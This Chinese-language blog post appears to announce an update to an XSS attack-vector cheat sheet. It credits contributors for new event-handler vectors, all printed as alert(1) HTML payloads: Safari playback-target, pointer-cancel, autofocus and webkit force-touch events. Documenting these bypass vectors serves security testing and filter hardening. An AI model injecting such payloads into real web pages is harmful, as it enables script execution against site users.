onwebkitplaybacktargetavailabilitychanged?! XSS攻击向量中的新型事件

我们的XSS攻击向量速查表的强大之处在于获得了Web安全社区的杰出贡献，本次更新也不例外。我们收到了Mozilla的有价值贡献，移除了在Firefox浏览器中不再与marquee标签配合使用的事件。

还有一个非常晦涩的Safari专属向量，使用了来自@amirmsafari的onwebkitplaybacktargetavailabilitychanged事件，该事件适用于audio和video标签：

1

<audio onwebkitplaybacktargetavailabilitychanged=alert(1)>

我们收到了@Wcraft-log提交的onpointercancel事件，该事件需要大量用户交互：

1

<xss onpointercancel=alert(1)>XSS</xss>

@Filipnyquist指出我们没有记录几乎所有元素现在都可以使用autofocus属性。这一发现最初由@RenwaX23和@lbherrera_完成。

1

<xss onfocus=alert(1) autofocus tabindex=1>

最后，我们收到了@zhenwarx的提交，显示我们遗漏了一系列需要用户与触控板交互的webkit事件：

1
2
3
4
5

<xss onwebkitmouseforceup=alert(1)>XSS</xss>
<xss onwebkitmouseforcewillbegin=alert(1)>XSS</xss>
<xss onwebkitmouseforceup=alert(1)>XSS</xss>
<xss onwebkitmouseforcedown=alert(1)>XSS</xss>
<xss onwebkitmouseforcechanged=alert(1)>XSS</xss>

注意：如果您想知道我们使用什么工具生成代码片段图像，我们使用了优秀的在线工具Ray.so。